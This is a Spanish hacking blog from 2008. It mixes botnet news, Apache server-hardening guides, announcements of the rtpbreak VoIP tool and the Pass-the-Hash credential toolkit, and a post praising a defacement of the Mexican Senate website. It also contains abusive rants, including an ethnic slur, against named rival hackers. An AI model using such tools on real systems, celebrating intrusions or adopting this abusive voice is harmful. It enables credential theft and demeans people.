Espero que hayan disfrutado de este tutorial, y aprendido algo nuevo en el.

no mucho pero algo un poco novaton para que empiezen en algo...

Creado por Romeo 

lunes, 19 de mayo de 2008

Botnet en Nueva Modalidad,Con Ataques de Inyeccion Sql wow :)

Ahora se trata de un interesante giro de los acontecimientos, la Asprox botnet malware está siendo utilizada para difundir Inyección SQL en lugar de herramientas de envío de "phishing" e-mails como antes.

Parece bastante para instalar furtivamente y disfrazar como un servicio Windows, con bastante fiabilidad en el nombre de archivo. Es sin duda interesante ver la evolución de este tipo de malware, lo que será la próxima?

Una botnet es equipar a su ejército de computadoras comprometidas con un ataque de inyección SQL herramienta para vulnerar los sitios Web, los investigadores de SecureWorks lo han descubierto.

Según SecureWorks, Asprox la botnet, una vez utilizados exclusivamente para enviar phishing e-mails, está impulsando la herramienta a sus sistemas en red a través de un binario con el nombre de archivo msscntr32.exe. El ejecutable se instala como un servicio del sistema con el nombre de "Centro de seguridad de Microsoft de Extensión."

A pesar del nombre, el fichero es en realidad un ataque de inyección SQL herramienta que cuando se inició la búsqueda de Google. Asp páginas que contienen ciertos términos. A continuación, lanza ataques de inyección SQL contra los sitios web devuelto por la búsqueda.

La mala noticia es que no muchos vendedores de AV son la detección de que, sin embargo, parece que no es más que otra vía o vector de la infección por el Asprox malware. . Se inyecta en un IFRAME vulnerables páginas que dará lugar a la descarga de la Asprox infector.

La tormenta hizo una variación de este como se indica a través de FTP.

De acuerdo con una lista de VirusTotal, sólo un puñado de los principales anti-virus son la detección de la herramienta de ataque en este momento.

director of malware research at SecureWorks. "Esta es la primera vez que he visto una herramienta de inyección SQL, pero sin duda otros botnets han tratado de difundir de una manera similar, que infecta sitios web con iframes", dijo Joe Stewart, director de investigación de malware en SecureWorks. "Por ejemplo, la tormenta intenta obtener su contraseña en caso de que acceda a un sitio Web con FTP, y poner un iframe en la página para usted."

Hasta el momento, SecureWorks ha encontrado 1000 sitios Web infectados por esta ola de ataques SQL. Los visitantes de estos sitios Web infectados se infectan con el Asprox malware-convirtiéndolos en robots-y también descargar algunos scareware.

Parece como una escala bastante pequeña infección por el momento, pero es sin duda una tendencia preocupante. Parece que los chicos malos son definitivamente mantener el ritmo de las últimas vulnerabilidades en aplicaciones Web y en línea lenguas y que ellos están utilizando para difundir sus productos.

Es bien interesante esta botnet ya que cada vez evolucionan mas en el tipo de ataque que efectua,parece ser que es la misma variacion que la pasada,a diferencia que esta vez realiza ataques de Sql injection :) interesante......

miércoles, 14 de mayo de 2008

FBI alerta sobre cuestiones de vulnerabilidad de Wi-Fi

El FBI emitió una alerta esta semana advertencia de que las redes de Internet inalámbrico, a menudo llamado Wi-Fi, son más vulnerables a los hackers que probablemente la mayoría de los usuarios darse cuenta

.
En el sur de la Florida, Wi-Fi se encuentran en aeropuertos, restaurantes de comida rápida, librerías, cafés, bares deportivos, escuelas, centros comerciales, supermercados - un poco por todas partes.


Varias ciudades y barrios en la región plan para finalmente instalar redes para los residentes, también.
¿Qué tan seguro cree usted que es su punto de acceso local?


¿Confiamos en que haga sus finanzas personales u otras tareas a través de una cafetería de acceso Wi-Fi?

Para leer mas info sobre esto Aqui En Ingles

Fuente:
South Florida Sun-Sentinel

sábado, 10 de mayo de 2008

www.senado.gob.mx Hacked




si asi como lo ven la pagina del senado mejicano fue defeceada por knet y Boer,vulnerando la seguridad de la susodicha pagina...xD

lo mas comico de todo esto es la imagen que dejaron como era de esperarse de estos dos (2) colegas y su buen sentido del humor dejaron una foto de la chilindrina por poco me cago de la riza cuando vi la imagen el mensaje aluyente y el deface fue este:




Chafles this site has been Owned !!!!



hahaha un saludito para Roberto Gómez Bolaños

que todavia lo veo todas las mañanas ( es lo más grande que hay )

al final mi amiguito el her0 tenia razon U_U

los informaticos del Gob suckean.

de Argentina & Chile para el mundo, asi de simple.

legalizenla XD

Grets to:

All RemoteExecution USERS, syndr0me, f0urtruder, Phonyx, Panther-Root(4ever), n4ib4f

al JamZ, al Komtec1, al her0, dont.cool, InyeXion, Biser!, polk22, Wazz tambien, MurdeR, al compa zer0 z0rg, y al H4t3 m3 pssss, ´4N4rqu1A

y un besito pa la floop y para Yubix



ar:

VIVA PERON CARAJO !!!!

Argentina Fuerza, Estamos con el jodido Campo

nos cagamos de hambre, pero el pueblo siempre tiene la razon

cl:

El transantiago es una mierda, Solo produce accidentes

vean lo que el pueblo quiere Gilesssss!!!!

FUERZA HERMANOS DE CHAITEN


Contact:

Keynet.security@gmail.com - boer.defaxorz@gmail.com

xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Me imagino las caras de los grandes politicos mejicanos cuando ven su paginita
de logros hackeada jaja
aparte de los webmaster y programadores que trabajaban en
la seguridad de la pagina
2 palabras para ellos NO SEGURIDAD.....

EL miror del deface Aqui por si las moscas

en fin felicito a knet y boer por buen trabajo......

deja claro esto q a lo mejor nosotros no tenemos el poder
de que se nos escuchen en nuestros
paises o en nuestras calles pero aqui en la red nuestra voz es escuchada
o al menos lo intentaremos

aparte de todo Que Viva Chespirito K-rajo...

sin mas que decir se estan dando de que oir escuchenos
gobierno de mierda en todas las facciones
paises comunidades....

salu2

jueves, 8 de mayo de 2008

rtpbreak 1.3a Liberado - RTP Análisis y Hacking

rtpbreak 1.3a ha sido puesto en libertad, que inicialmente trajo noticias de esta herramienta de nuevo en agosto de 2007 con el primer lanzamiento del software

Con rtpbreak se puede detectar, reconstruir y analizar cualquier período de sesiones RTP. No requiere la presencia de paquetes RTCP y funciona independientemente de la forma utilizada protocolo de señalización (SIP, H.323, SCCP, etc.) La entrada es una secuencia de paquetes, la salida es un conjunto de archivos que se pueden utilizar como insumos para otras herramientas (Ethereal / tshark, sox, grep / awk / corte / cat / sed y así sucesivamente)También apoya inalámbrica (AP_DLT_IEEE802_11) redes.

Esta es una lista de escenarios donde rtpbreak es una buena elección:

  • reconstruir cualquier flujo RTP con un desconocido o no el protocolo de señalización
  • reconstruir cualquier flujo RTP en redes inalámbricas, haciendo saltar de canal (VoIP detector de actividad)
  • reconstruir y descifrar cualquier flujo RTP en modo batch (con sox, asterisco)
  • reconstruir todo paquetes ya existentes flujo RTP
  • reordenar los paquetes de cualquier flujo RTP para su posterior análisis (con tshark, Ethereal,…)
  • funcion inalámbrica de VoIP sistema de grabación en un solo chip de unidad de Linux
  • construir un completo sistema de grabación de VoIP (rtpbreak sería sólo el módulo de RTP dissector!)

Este proyecto está liberado bajo licencia GPL versión 2.

Puede descargar aquí rtpbreak 1.3a:

rtpbreak-1.3a.tg

O leer más Aqui

sábado, 3 de mayo de 2008

Cascanola El Lammo Mas Grande

en fin seguimos haciendole noticia al lammo este de cascanola y diran "a h4xxor le estas dando demasiada publicidad"...xD

PERO no lo que pasa que el tipo este la verdad que me tiene la punta de mi pinga hinchada.....

recalcando que soy uno de los usuarios de internet mas queridos de la red xD..."si claro" en fin ni me importa ya que no soy un billete de cien para caerle bien a nadie....

sigamos con el mamon este que se puede esperar de un tipo que vive con su madre de ahora en adelante le llamaremos Johnny Bravo :
xD xD...JAJAJA

que pueden esperar de un hombre que vive con su madre todavia en vez de estar mandando sus Gusanitos,Xploits(vease que escribi Xploits y no Exploits) se cree hacker por eso amigo usar Xploits no te hace hacker,no es lo mismo ni se escribe igual lammo....

aparte de su gran negocio de publicidad jajaja se lo mete mongo a sus usuarios pidiendoles o practicamente obligandolos a clickear su publicidad....

lo mas triste es que sus seguidores creen en el y practicamente se lo maman jajaja y lo creen un dios se ven en el chat rogandoles que les muestre como se hackea hotmail....xD

que diria la mama de cascanola de su hijo que es un triste tipo lleno de rencores miedos y Abusos cometidos lo dejaron traumatizado de por vida, creo que ella a rezado a dios para que le kite la vida al pobre lammo este por sus actividades diarias .

a la verdad que es un verdadero lammo permita dios y se le kiebre el kabron culo al mamon de mierda este indigena de peru masca hoja de coca este.....aqui una verdadera foto del indigena este de casca xD ,xDDDDDDDDDD:
que feo el k-bron...
.

Permisos de Archivos Y Directorios--->servidor apache(CGI)

seguimos con esto de nuestro server como es usual mucho de los defaces,intrusiones y juanketos xD ocurren por mal manejo del CHMOD. Por ejemplo creamos un archivo index.cgi y lo ponemos en el directorio de Apache R00t y recibimos el clasico aviso de "forbiden" que no tienes permisos para ver archivos en este servidor xD...y para poder verlo correctamente o trabaje le damos CHMOD 777 index.cgi...

Antes que hagas esto nuevamente detente a pensar,,,es esto seguro? esta blood tripeando en pali nuevamente xD?

la respuesta es facil NO!!!pero como damos permisos ?para que nuestro index.cgi funcione correctamente...Emepzemos:

CHMOD:
Apache nesesita Permisos para ejecutar correctamente el archivo Index.cgi pero no queremos que todo el mundo tenga permisos de lectura y escritura sobre el archivo (index.cgi) el propietario de este archivo se supone que es el que sea que tenga permisos de lectura y de escritura...
Como Lo Hacemos?
Código:
# chmod 755 index.cgi
los archivos fuera de nuestro root del servidor no deben ser vistos....
Recalquemos y agregamos esta linea a nuestro archivo apache.conf:
Código:
Options FollowSymLinks AllowOverride None
Importante

1-La Linea que agregamos que mencionamos arriba previene a Apache a acceder a archivos y directorios fuera de nuestro root del servidor o sea de nuestro server...

2-Recordemos que otras distribuciones contienen por defecto mejor configuracion de seguridad que otras...

No queremos a usuarios corriendo cgi's donde sea en el directorio de archivos y menos aun no queremos que corran como r00t,la solucion de este problema es "El Directorio Options ExecCGI
ejemplo:agrega esta linea al /etc/apache2/apache2.conf:
Código:
AllowOverride None Options ExecCGI Order allow,deny Allow from all
Recargamos Apache:
Código:
# /etc/init.d/apache2 reload
========================================================
Entonces si tu tienes recursos o servicios que solamente entran por medio de una red o un Ip especifico..
La solucion a este problema seria la siguiente configuracion para que apache funcione:
Ejemplo:only allow access to network 192.168.0.0.
Cambiariamos las siguientes lineas en el /etc/apache2/apache2.conf:
Código:
AllowOverride None Options ExecCGI Order allow,deny Allow from all
Por
Código:
AllowOverride None Options ExecCGI Order Deny,Allow Deny from all Allow from 192.168.0.0/16.
Recargamos Apache Nuevamente Para ver si surgieron efectos
Código:
# /etc/init.d/apache2 reload
Ahora solamente usuarios de tu red interna,Podran correr scripts Cgi's en "/home/username/public_html/cgi-bin"

Usuarios Y Grupos En Apache--->Ubuntu 7.10 Servidor

Usuarios Y Grupos:

Sigamos Con Nuestra Configuracion De Nuestro Server En Ubuntu 7.10 Asumo Que Ya Instalaron EL server
si No Arriba En Esta Chincheta Esta El manual Echemos Manos A la Obra:

Que Vamos A Hacer?
Aseguraremos el Acceso A nuetro Servidor Y Dar Los Permisos Nesesarios A Los Archivos En El
Una De Las Cosas Que Tenemos Que Asegurar Siempre Que Apache No este Corriendo Como Root
Por Que En El Caso De Una Escalada De Privilegios O Un Hacker Ataque Nuestro Server No Tome Control De Nuestra
Cuenta Root. Ahora Veamos En Que Grupo De usuarios Apache Corre


Realizamos El Siguiente Comando
Código:
# ps auwwfx | grep apache
www-data 6216 0.0 0.3 7260 1832 ? S 17:29 0:00 \_ /usr/sbin/apache-perl
www-data 6217 0.0 0.3 7260 1832 ? S 17:29 0:00 \_ /usr/sbin/apache-perl
www-data 6218 0.0 0.3 7260 1832 ? S 17:29 0:00 \_ /usr/sbin/apache-perl
www-data 6219 0.0 0.3 7260 1832 ? S 17:29 0:00 \_ /usr/sbin/apache-perl
www-data 6224 0.0 0.3 7260 1832 ? S 17:29 0:00 \_ /usr/sbin/apache-perlt
Como Podemos Ver El Usuario www-data Es Quien Esta Corriendo Apache,Como Quiera Tenemos Que Crear Un Grupo Y Usuario
Para Apache

Código:
# groupadd www-data
# useradd -g www-data www-data
# vi /etc/apache2/apache2.conf
Cambiamos User root Group root A User www-data Group www-data
Recaragamos Para Asegurarnos Que Todo Salio Bien
Código:
# /etc/init.d/apache2 reload

Ya Con Eso Nos Hemos Ocupado Que Apache Este Corriendo Con Su Grupo Y Usuarios Para Ir Fortaleciendo Nuestro Server

Servidor Apache (Apache,PHP,ProFTPd)-->Instalacion Ubuntu 7.10

Bueno Aqui A continuacion Una Guia Para Instalar Un Servidor Apache En Ubuntu 7.10.

Ideal Para Hacer Pruebas O Para Adentrarte En El Mundo De Los Webservers O Lo Que Creas.

Que Instalaremos?

  • Apache
  • PHP5
  • Proftpd

    Asi Tendremos Los Componentes Basicos Para Tener Nuestro Server Localmente Y Si Se Puede Configurar Para Habilitarlo Web Esto Es Una Simple Guia Para Instalarlo.

    Primero Instalaremos Apache
    Código:
    apt-get install apache2 apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert
    De Esa Forma Instalamos Apache Y todos Sus Componentes Nesesarios.
    Instalamos PHP5
    Código:
    apt-get install libapache2-mod-php5 php5 php5-common php5-curl php5-dev php5-gd php5-idn php-pear php5-imagick php5-imap php5-json php5-mcrypt php5-memcache php5-mhash php5-ming php5-mysql php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl
    Como Podemos Ver Se Instalan Inclusive Hasta Las Librerias.
    Saldra La siguiente Pregunta A La Que Constestaremos
    Continue installing libc-client without Maildir support?<-- Yes
    Ahora Editaremos Este Archivo
    /etc/apache2/mods-available/dir.conf:
    Código:
    vi /etc/apache2/mods-available/dir.conf
    Y Cambiaremos La Linea Del Directorio Principal:
    Código:


    #DirectoryIndex index.html index.cgi index.pl index.php index.xhtml
    DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl index.xhtml

    (Editado En El Archivo Obviamente)
    Ahora Habilitaremos Algunos Modulos De Apache (SSL, rewrite, suexec, y include:)
    Código:
    a2enmod ssl
    a2enmod rewrite
    a2enmod suexec
    a2enmod include
    Recargaremos La Configuracion De Apache
    Código:
    /etc/init.d/apache2 force-reload
    Desabilitamos PhP Globalmente
    Si No Tienen Planes De Instalar ISPConfig En Este Servidor Solo Omitan Esta Parte
    En La Configuracion Del ISPConfig Configuraremos los componentes basicos basados-webs-->ahi daremos los permisos de los websites que pueden correr scripts y los que no Esto Solo Trabajara Si Tenemos Desabilitado PHP Globalmente,Si No Todos Los Websites Alojados Podran Correr Scripts (PHP),Sin Importar que Configues ISPConfig
    Para Desabilitar PHP Globalmente Editamos/etc/mime.typesY Comentamos Las Lineas Deapplication/x-httpd-php
    Código:
    vi /etc/mime.types
    Serian:
    Código:
    [...]
    #application/x-httpd-php phtml pht php
    #application/x-httpd-php-source phps
    #application/x-httpd-php3 php3
    #application/x-httpd-php3-preprocessed php3p
    #application/x-httpd-php4 php4
    [...]
    Editaremos/etc/apache2/mods-enabled/php5.confY Comentaremos las Siguientes Lineas En Este Archivo
    Código:
    vi /etc/apache2/mods-enabled/php5.conf
    Recuerden Que Siempre Para Comentar Se Usa (#) Sin Los Parentesis
    Lineas A Comentar
    Código:

    #AddType application/x-httpd-php .php .phtml .php3
    #AddType application/x-httpd-php-source .phps
    Reiniciamos Apache
    Código:
    /etc/init.d/apache2 restart
    Ahora Vamos A La Parte De ProFTPd
    Para Instalarlo
    Código:
    apt-get install proftpd ucf
    Saldra La siguiente Pregunta A La Que Constestaremos
    Run proftpd from inetd or standalone?<-- standalone
    Despues Abriremos/etc/proftpd/proftpd.confY CambiamosUseIPv6DeonParaoff;Si No Lo Cambiamos Recibiremos Una Advertencia Como Esta Cuando Inicies ProFTPd
    Si Recibes Una Advertencia Como Esta
    - IPv6 getaddrinfo 'server1.example.com' error: Name or service not known
    Puedes Igual Modificar /etc/hostsY Agregarserver1.example.comA La Linea::1
    De Esta Manera:
    Código:
    vi /etc/hosts
    Código:
    127.0.0.1       localhost.localdomain   localhost
    192.168.0.100 server1.example.com server1

    # The following lines are desirable for IPv6 capable hosts
    ::1 ip6-localhost ip6-loopback server1.example.com
    fe00::0 ip6-localnet
    ff00::0 ip6-mcastprefix
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    ff02::3 ip6-allhosts
    O Si No Puedes Abrir/etc/proftpd/proftpd.confY CambiarUseIPv6DeonParaoff
    Código:
    vi /etc/proftpd/proftpd.conf
    Código:
    [...]
    UseIPv6 off
    [...]
    Por Razones De Seguridad Agregaremos Las Siguientes Lineas/etc/proftpd/proftpd.conf
    Código:
    vi /etc/proftpd/proftpd.conf
    Código:
    [...]
    DefaultRoot ~
    IdentLookups off
    ServerIdent on "FTP Server ready."
    [...]
    La ISPconfig Se Supone Que Este/etc/proftpd.confEn Vez De/etc/proftpd/proftpd.conf,Crearemos Una Referencia Pueden Obviar este Paso Si No Van Instalar ISPconfig
    Código:
    ln -s /etc/proftpd/proftpd.conf /etc/proftpd.conf
    Reiniciamos ProFTPd
    Código:
    /etc/init.d/proftpd restart
    Y Ya Tienen Su Servidor Casero Con Ubuntu Instalado.Recuerden Que No Esta Totalmente Configurado Ya Les Pondre La Manera De Asegurarlo Y cosas Wink
    Que Es ISPconfig?
    ISPConfig es un gestor de hosting para la administración de ISPs. Gestiona sus servidores Webs, servidores de email, BIND DNS, proftpd + vsftpd Server, bases de datos MySQL. Spamssassin, y cuotas en discos de manera fácil, desde una interface Web, pudiendo a su vez gestionarse desde los administradores, revendedores y clientes.
    Espero Que Esto Le Sirva De Guia Para Montar Su Servidor Casero Con Ubuntu Como S.O

Pass-Hash-Toolkit v1.3

Pass-Hash Toolkit contiene herramientas para manipular la sesión de Windows Logon mantenida por el LSA (autoridad de seguridad local) componente. Estas herramientas permiten a la lista el actual código de acceso sesiones con sus correspondientes credenciales NTLM (por ejemplo: los usuarios conectados remotamente a través de Escritorio remoto y Terminal Services), y también el cambio en el tiempo de ejecución actual nombre de usuario, nombre de dominio, y NTLM hashes.

Pass-Hash-Toolkit

Pass-Hash-Toolkit está compuesto por tres herramientas: IAM.EXE, WHOSTHERE.EXE y GENHASH.EXE.

GENHASH.EXE GENHASH.EXE
Esto es sólo una herramienta que utiliza algunas funciones de Windows indocumentados para generar la LM y NT hash de una contraseña. Esta herramienta es útil para poner a prueba IAM.EXE y WHOSTHERE.EXE y tal vez hacer algunas otras cosas. Bastante simple y pequeña herramienta.

IAM.EXE IAM.EXE
Esta herramienta le permite cambiar su actual credenciales NTLM, sin tener la contraseña sin formato, pero los hashes de la contraseña. El programa recibe un nombre de usuario, nombre de dominio y la LM y NT hashes de la contraseña; el uso de este cambio que en la memoria credenciales NTLM relacionados con la actual Windows período de sesiones. Después de que el programa lleva a cabo esta operación, todas las conexiones de red salientes a los servicios que utilizan para la autenticación NTLM credenciales de los accedido a usuario utilizar las credenciales de IAM.EXE modificados.

WHOSTHERE.EXE WHOSTHERE.EXE
Esta herramienta, aparecerá una lista de sesiones de conexión con credenciales NTLM (nombre de usuario, nombre de dominio, LM y NT hashes)ingreso de sesiones son creadas por las ventanas que los servicios de registro en la utilización de determinados usuarios, escritorio remoto, etc Esta herramienta tiene muchos usos, uno que creo que es interesante: Digamos que usted a comprometido un servidor Windows que es parte de un dominio de Windows ( por ejemplo: el servidor de copia de seguridad), pero NO es el controlador de dominio.

Puede descargar Pass-The-Hash Toolkit v1.3 aquí

Código fuente:

Última versión estable (1.3)

Win32 binarios:

Última versión estable (1.3),

O leer más Aqui




viernes, 2 de mayo de 2008

Guerra de Lammers Capitulo 1 xD

xD......Hay una nueva modalidad de guerras ciberneticas en la red...

en viejos tiempos nos acordamos de las guerras ciberneticas entre hackers como las vividas en el pasado entre hackers de israel y los de jordania,turkos contra los judios..o la gran llamada "Gran Guerra entre Hackers" Great Hacker War jeje que se vivio entre el grupo de Legion of Doom y el grupo de Masters of Deception eso fueron viejos tiempos....xD y sin olvidarnos de las guerras entre defacers y hackers latinoamericanos....

Pero ya los tiempos ya han cambiado y ahora los que recobran fuerzas son los Lammers si asi como lo leen quera entre Lammers xD si yo pense lo mismo ya los pajaritos le tiran a las escopetas... xD

Pero en este caso no se si llamarles pajaritos o que K-rajo pero en realidad de lo que se trata esto es de la guerra lameril que tiene la gente de Cascanola y los de Terminal Hacker ....dios santo no habia visto acciones tan lameriles por 2 grupos...

aunque cabe reconocer que la gente Terminal Hacker son mas cuerdos y piensan las cosas mejor ellos al menos no se veian asi de la manera que se ve los de Cascanola pero lo que paso con los de
Terminal Hacker que calleron en la enfermedad de los de Casca ya que primero los de Casca tienen una mierda de programa que se llama Turbinas por dios pero eso es menos que una mierda de Ddos y aparte de eso habilitaron un chat y le ordenan a sus usuarios a que ataken y lo mas lammo y comico que les queda es que hay un par de usuario incluyendo a Cascanola pidiendole a sus usuarios Atakeeeeeeeeennn!!! como si fuera una batalla en los tiempos medeviales pero en este caso con sus turbinas xD....

no habia visto un lammo tan grande desde megamierda este le gano!!! -->xD<-- entonces esta tal actividad a hecho que los de Terminal Hacker caigan en la misma actividad que los de casca valla mierda....

de verdad que creo que es la guerra cibernetica mas comica,estupida e idiota que habia visto pero en fin ya veremos en que termina esto...

aparte que el casca este coje de pendejo a sus usuarios y les dice que los que ataken el los hace V.I.P por que el sabe quien lo hace con sus conocimientos en la mamaera digo en el hacking "vaya lammo " por dios ese tipo no sabe ni usar un scanner de puertos apenas sabe ocupar linux y teclear "startx" en fin esto acabara algun dia esperemos ese dia por que la red cada vez se pone peor con estos individuos...